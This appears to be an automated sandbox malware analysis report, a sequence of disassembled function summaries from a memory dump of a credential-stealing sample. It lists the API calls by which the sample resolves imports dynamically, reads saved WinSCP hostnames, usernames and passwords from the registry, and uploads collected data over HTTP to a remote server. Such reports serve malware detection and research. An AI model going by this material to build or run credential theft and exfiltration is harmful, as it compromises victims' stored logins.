                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: InfoSystemwsprintf
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2452939696-0
                                                                                                                                                                                                                                        • Opcode ID: df8f2003c154096ee6bab9342032087ac5f8666e1f2cf3cadbe6a54d86bda0d6
                                                                                                                                                                                                                                        • Instruction ID: 02812af920acb22cdc7078cfa6f9a81c02f6a6398f02c401a58ac9223811f8c5
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: df8f2003c154096ee6bab9342032087ac5f8666e1f2cf3cadbe6a54d86bda0d6
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 81D0C2B980010C97C710DB90EC859E9B3BCAB04200F404295EF04A3180E7756A1DCAE5
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(76210000,01452840), ref: 00418CC5
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(76210000,014529E0), ref: 00418CDD
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(76210000,0145D9C0), ref: 00418CF6
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(76210000,0145DBA0), ref: 00418D0E
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(76210000,0145DA08), ref: 00418D26
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(76210000,0145DA38), ref: 00418D3F
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(76210000,01453A38), ref: 00418D57
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(76210000,0145DA50), ref: 00418D6F
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(76210000,0145DB40), ref: 00418D88
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(76210000,0145DB28), ref: 00418DA0
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(76210000,0145DA68), ref: 00418DB8
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(76210000,01452A60), ref: 00418DD1
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(76210000,01452AE0), ref: 00418DE9
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(76210000,01452900), ref: 00418E01
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(76210000,01452920), ref: 00418E1A
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(76210000,0145DB70), ref: 00418E32
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(76210000,0145DB88), ref: 00418E4A
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(76210000,01453AB0), ref: 00418E63
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(76210000,01452B00), ref: 00418E7B
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(76210000,0145DBD0), ref: 00418E93
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(76210000,0145DBB8), ref: 00418EAC
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(76210000,0145DA80), ref: 00418EC4
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(76210000,0145DCC0), ref: 00418EDC
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(76210000,01452CC0), ref: 00418EF5
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(76210000,0145DCD8), ref: 00418F0D
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(76210000,0145DCF0), ref: 00418F25
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(76210000,0145DD38), ref: 00418F3E
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(76210000,0145DD20), ref: 00418F56
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(76210000,0145DD08), ref: 00418F6E
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(76210000,0145DD50), ref: 00418F87
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(76210000,0145DD68), ref: 00418F9F
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(76210000,0145DCA8), ref: 00418FB7
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(76210000,01461430), ref: 00418FD0
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(76210000,0145C330), ref: 00418FE8
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(76210000,01461448), ref: 00419000
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(76210000,014614F0), ref: 00419019
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(76210000,01452F00), ref: 00419031
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(76210000,014614A8), ref: 00419049
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(76210000,01452E00), ref: 00419062
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(76210000,014614D8), ref: 0041907A
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(76210000,014614C0), ref: 00419092
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(76210000,01452DC0), ref: 004190AB
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(76210000,01452C60), ref: 004190C3
                                                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(01461460,0041807F,?,00000040,00000064,004144A0,00413A10,?,0000002C,00000064,004143F0,00414440,?,00000024,00000064,00414340), ref: 004190D5
                                                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(01461478), ref: 004190E6
                                                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(01461490), ref: 004190F8
                                                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(014613E8), ref: 0041910A
                                                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(01461250), ref: 0041911B
                                                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(01461220), ref: 0041912D
                                                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(01461238), ref: 0041913F
                                                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(01461130), ref: 00419150
                                                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(dbghelp.dll), ref: 00419160
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(751E0000,01452DA0), ref: 0041917C
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(751E0000,014611A8), ref: 00419194
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(751E0000,0145F5F0), ref: 004191AD
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(751E0000,01461400), ref: 004191C5
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(751E0000,01452D20), ref: 004191DD
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(73F70000,01453B00), ref: 004191FD
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(73F70000,01452E40), ref: 00419215
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(73F70000,01453880), ref: 0041922E
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(73F70000,014613D0), ref: 00419246
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(73F70000,01461418), ref: 0041925E
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(73F70000,01452FE0), ref: 00419277
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(73F70000,01452FC0), ref: 0041928F
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(73F70000,014612E0), ref: 004192A7
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(753A0000,01452EC0), ref: 004192C3
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(753A0000,01452E80), ref: 004192DB
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(753A0000,01461148), ref: 004192F4
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(753A0000,01461280), ref: 0041930C
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(753A0000,01452EA0), ref: 00419324
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(76310000,01453B78), ref: 00419344
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(76310000,01453948), ref: 0041935C
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(76310000,01461310), ref: 00419375
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(76310000,01452F80), ref: 0041938D
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(76310000,01452EE0), ref: 004193A5
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(76310000,014538A8), ref: 004193BE
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(76910000,01461208), ref: 004193DE
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(76910000,01452E20), ref: 004193F6
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(76910000,0145F640), ref: 0041940F
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(76910000,01461298), ref: 00419427
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(76910000,014611D8), ref: 0041943F
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(76910000,01452FA0), ref: 00419458
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(76910000,01452F20), ref: 00419470
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(76910000,01461160), ref: 00419488
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(76910000,014612C8), ref: 004194A1
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75B30000,01452E60), ref: 004194BD
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75B30000,01461328), ref: 004194D5
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75B30000,01461268), ref: 004194EE
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75B30000,014612B0), ref: 00419506
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75B30000,01461340), ref: 0041951E
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75670000,01452F40), ref: 0041953A
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75670000,01452CA0), ref: 00419552
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(76AC0000,01452D40), ref: 0041956E
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(76AC0000,01461358), ref: 00419586
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(6F500000,01452F60), ref: 004195A6
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(6F500000,01452D60), ref: 004195BE
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(6F500000,01452C40), ref: 004195D7
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(6F500000,01461178), ref: 004195EF
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(6F500000,01452CE0), ref: 00419607
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(6F500000,01452C80), ref: 00419620
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(6F500000,01452DE0), ref: 00419638
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(6F500000,01452D00), ref: 00419650
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(6F500000,HttpQueryInfoA), ref: 00419667
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(6F500000,InternetSetOptionA), ref: 0041967E
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75AE0000,01461190), ref: 0041969A
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75AE0000,0145F6E0), ref: 004196B2
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75AE0000,014611C0), ref: 004196CB
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75AE0000,014612F8), ref: 004196E3
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(76300000,01452D80), ref: 004196FF
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(6D170000,014611F0), ref: 0041971B
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(6D170000,014618D8), ref: 00419733
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(6D170000,01461370), ref: 0041974C
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(6D170000,01461388), ref: 00419764
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(6CF80000,SymMatchString), ref: 0041977E
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                                                        • String ID: HttpQueryInfoA$InternetSetOptionA$SymMatchString$dbghelp.dll
                                                                                                                                                                                                                                        • API String ID: 2238633743-951535364
                                                                                                                                                                                                                                        • Opcode ID: c2eee7ed20b900ebed499d3f5db1f2319c82ae11ff88e2a78b23ac08a5a2bb96
                                                                                                                                                                                                                                        • Instruction ID: c5f05c92df86ae6c309de6d93bbb22230759f21ed052dce6c69101577189e498
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c2eee7ed20b900ebed499d3f5db1f2319c82ae11ff88e2a78b23ac08a5a2bb96
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F06210BD6002029FD744DFA5ECA896637FBF78BB413A06519FA05C7364E734A885CB60
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • memset.MSVCRT ref: 0040C58B
                                                                                                                                                                                                                                        • memset.MSVCRT ref: 0040C5AA
                                                                                                                                                                                                                                        • memset.MSVCRT ref: 0040C5C2
                                                                                                                                                                                                                                        • memset.MSVCRT ref: 0040C5DA
                                                                                                                                                                                                                                        • memset.MSVCRT ref: 0040C5ED
                                                                                                                                                                                                                                        • memset.MSVCRT ref: 0040C5FB
                                                                                                                                                                                                                                        • memset.MSVCRT ref: 0040C60C
                                                                                                                                                                                                                                        • RegOpenKeyExA.KERNEL32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,000000FF), ref: 0040C62E
                                                                                                                                                                                                                                        • RegGetValueA.ADVAPI32(000000FF,Security,UseMasterPassword,00000010,00000000,?,?), ref: 0040C69E
                                                                                                                                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Sessions,00000000,00000009,000000FF), ref: 0040C6D6
                                                                                                                                                                                                                                        • RegEnumKeyExA.ADVAPI32(000000FF,00000000,?,00000104,00000000,00000000,00000000,00000000), ref: 0040C718
                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 0040C72C
                                                                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 0040C733
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(00421610,Soft: WinSCP), ref: 0040C74C
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(00421610,Host: ), ref: 0040C75B
                                                                                                                                                                                                                                        • RegGetValueA.ADVAPI32(000000FF,?,HostName,00000002,00000000,?,?), ref: 0040C77F
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(00421610,?), ref: 0040C78C
                                                                                                                                                                                                                                        • RegGetValueA.ADVAPI32(000000FF,?,PortNumber,0000FFFF,00000000,?,?), ref: 0040C7B7
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(00421610,00000000), ref: 0040C7DD
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(00421610,:22), ref: 0040C7F9
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(00421610,00427E4C), ref: 0040C808
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(00421610,Login: ), ref: 0040C817
                                                                                                                                                                                                                                        • RegGetValueA.ADVAPI32(000000FF,?,UserName,00000002,00000000,?,?), ref: 0040C83B
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(00421610,?), ref: 0040C848
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(00421610,00427E64), ref: 0040C857
                                                                                                                                                                                                                                        • RegGetValueA.ADVAPI32(000000FF,?,Password,00000002,00000000,?,?), ref: 0040C87B
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(00421610,Password: ), ref: 0040C886
                                                                                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,00427B3E), ref: 0040C898
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(00421610,00000000), ref: 0040C8D3
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(00421610,00427E80), ref: 0040C8ED
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(00421610,00427E84), ref: 0040C8FC
                                                                                                                                                                                                                                        • RegEnumKeyExA.ADVAPI32(000000FF,00000001,?,00000104,00000000,00000000,00000000,00000000), ref: 0040C921
                                                                                                                                                                                                                                          • Part of subcall function 00411C10: wsprintfA.USER32 ref: 00411C2B
                                                                                                                                                                                                                                        • memset.MSVCRT ref: 0040C932
                                                                                                                                                                                                                                        • memset.MSVCRT ref: 0040C940
                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00421610), ref: 0040C958
                                                                                                                                                                                                                                        • memset.MSVCRT ref: 0040C9AB
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: lstrcat$memset$Value$EnumHeapOpen$AllocProcesslstrlenwsprintf
                                                                                                                                                                                                                                        • String ID: :22$Host: $HostName$Login: $Password$Password: $PortNumber$Security$Soft: WinSCP$Software\Martin Prikryl\WinSCP 2\Configuration$Software\Martin Prikryl\WinSCP 2\Sessions$UseMasterPassword$UserName$passwords.txt
                                                                                                                                                                                                                                        • API String ID: 4109173386-1250616252
                                                                                                                                                                                                                                        • Opcode ID: dd88397acad7059dfc11fc0bc3abe15bada8366f415904047003f7cb184d2dc8
                                                                                                                                                                                                                                        • Instruction ID: 39ec2e8349ec0f49430afd06625ec9b021e02694a525698c05ba917c3cb00e0c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: dd88397acad7059dfc11fc0bc3abe15bada8366f415904047003f7cb184d2dc8
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 51D17AB190021AEBDB10DBE4DC95EFFB77CEB48708F50459AF615A3280D6785E488B74
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 88 404dd0-404ee9 call 40fec0 call 4043c0 call 4117a0 call 410120 lstrlen call 410120 call 4117a0 call 40fe80 * 5 StrCmpCA 111 404ef2-404ef7 88->111 112 404eeb 88->112 113 404f17-40503e call 4114d0 call 40ffb0 call 40ff60 call 40ff00 * 2 call 410040 call 40ffb0 call 410040 call 40ff60 call 40ff00 * 3 call 410040 call 40ffb0 call 40ff60 call 40ff00 * 2 InternetConnectA 111->113 114 404ef9-404f11 call 410120 InternetOpenA 111->114 112->111 119 405765-4057a4 call 411400 * 2 call 4100d0 * 4 call 40fec0 113->119 183 405044-40507c HttpOpenRequestA 113->183 114->113 114->119 148 4057a9-40582e call 40ff00 * 9 119->148 185 405082-405086 183->185 186 40575e-40575f InternetCloseHandle 183->186 187 405088-405098 InternetSetOptionA 185->187 188 40509e-405693 call 410040 call 40ff60 call 40ff00 call 40ffb0 call 40ff60 call 40ff00 call 410040 call 40ff60 call 40ff00 call 410040 call 40ff60 call 40ff00 call 410040 call 40ff60 call 40ff00 call 410040 call 40ff60 call 40ff00 call 40ffb0 call 40ff60 call 40ff00 call 410040 call 40ff60 call 40ff00 call 410040 call 40ff60 call 40ff00 call 40ffb0 call 40ff60 call 40ff00 call 410040 call 40ff60 call 40ff00 call 410040 call 40ff60 call 40ff00 call 410040 call 40ff60 call 40ff00 call 410040 call 40ff60 call 40ff00 call 4023c0 call 40ffb0 call 40ff60 call 40ff00 * 2 call 410040 call 40ff60 call 40ff00 call 410040 call 40ff60 call 40ff00 call 40ffb0 call 40ff60 call 40ff00 call 410040 call 40ff60 call 40ff00 call 410040 call 40ff60 call 40ff00 call 410040 call 40ff60 call 40ff00 call 410040 call 40ff60 call 40ff00 call 410040 call 40ff60 call 40ff00 call 410040 call 40ff60 call 40ff00 call 410040 call 40ff60 call 40ff00 call 40ffb0 call 40ff60 call 40ff00 call 410040 call 40ff60 call 40ff00 call 410040 call 40ff60 call 40ff00 call 410040 call 40ff60 call 40ff00 call 410040 call 40ff60 call 40ff00 call 410120 lstrlen call 410120 lstrlen GetProcessHeap HeapAlloc call 410120 lstrlen call 410120 memcpy call 410120 lstrlen memcpy call 410120 lstrlen call 410120 * 2 lstrlen memcpy call 410120 lstrlen call 410120 HttpSendRequestA call 411400 HttpQueryInfoA 185->188 186->119 187->188 395 405695-4056a4 call 40fe80 188->395 396 4056a9-4056bd call 4113d0 188->396 395->148 401 4056c3-4056dc InternetReadFile 396->401 402 40582f-40583e call 40fe80 396->402 403 405735-40574b call 410120 StrCmpCA 401->403 404 4056de 401->404 402->148 411 405754-40575b InternetCloseHandle 403->411 412 40574d-40574e ExitProcess 403->412 407 4056e0-4056e5 404->407 407->403 410 4056e7-405733 call 410040 call 40ff60 call 40ff00 InternetReadFile 407->410 410->403 410->407 411->186
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FEE8
                                                                                                                                                                                                                                          • Part of subcall function 004043C0: ??_U@YAPAXI@Z.MSVCRT ref: 00404412
                                                                                                                                                                                                                                          • Part of subcall function 004043C0: ??_U@YAPAXI@Z.MSVCRT ref: 0040441F
                                                                                                                                                                                                                                          • Part of subcall function 004043C0: ??_U@YAPAXI@Z.MSVCRT ref: 0040442C
                                                                                                                                                                                                                                          • Part of subcall function 004043C0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00404446
                                                                                                                                                                                                                                          • Part of subcall function 004043C0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404456
                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404E56
                                                                                                                                                                                                                                          • Part of subcall function 004117A0: CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?), ref: 004117C4
                                                                                                                                                                                                                                          • Part of subcall function 004117A0: GetProcessHeap.KERNEL32(00000000,?,?,00404E4A,?,?,?,?,?,?,00000000,00000000,00000000), ref: 004117D3
                                                                                                                                                                                                                                          • Part of subcall function 004117A0: RtlAllocateHeap.NTDLL(00000000,?,?,00404E4A,?,?,?,?,?,?,00000000,00000000,00000000), ref: 004117DA
                                                                                                                                                                                                                                          • Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9
                                                                                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,0145F7A0,004278A7,004278A3,0042789B,00427897,00427896), ref: 00404EE1
                                                                                                                                                                                                                                        • InternetOpenA.WININET(00000000,00000001,?,?,?), ref: 00404F07
                                                                                                                                                                                                                                        • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                        • HttpOpenRequestA.WININET(00000000,0145F8C0,?,01462F48,00000000,00000000,-00400100,00000000), ref: 00405072
                                                                                                                                                                                                                                        • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405098
                                                                                                                                                                                                                                          • Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,014532E8,?), ref: 0041007C
                                                                                                                                                                                                                                          • Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
                                                                                                                                                                                                                                          • Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1
                                                                                                                                                                                                                                          • Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0
                                                                                                                                                                                                                                          • Part of subcall function 0040FFB0: lstrcpy.KERNEL32(00000000), ref: 00410013
                                                                                                                                                                                                                                          • Part of subcall function 0040FFB0: lstrcat.KERNEL32(?,00000000), ref: 0041001F
                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000,00000000,?,",00000000,?,file_data,00000000,?,014622F8,00000000,?,00427960,00000000,?,?), ref: 00405590
                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000), ref: 004055A2
                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004055B5
                                                                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 004055BC
                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000), ref: 004055CE
                                                                                                                                                                                                                                        • memcpy.MSVCRT ref: 004055E2
                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000,?,?), ref: 004055FB
                                                                                                                                                                                                                                        • memcpy.MSVCRT ref: 00405605
                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000), ref: 00405616
                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 0040562F
                                                                                                                                                                                                                                        • memcpy.MSVCRT ref: 0040563C
                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000,?,00000000), ref: 00405652
                                                                                                                                                                                                                                        • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00405663
                                                                                                                                                                                                                                        • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 0040568B
                                                                                                                                                                                                                                        • InternetReadFile.WININET(00000000,?,000007CF,00000000), ref: 004056D4
                                                                                                                                                                                                                                        • InternetReadFile.WININET(00000000,00000000,000007CF,00000000), ref: 0040572B
                                                                                                                                                                                                                                        • StrCmpCA.SHLWAPI(00000000,block), ref: 00405743
                                                                                                                                                                                                                                        • ExitProcess.KERNEL32 ref: 0040574E
                                                                                                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 0040575F
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
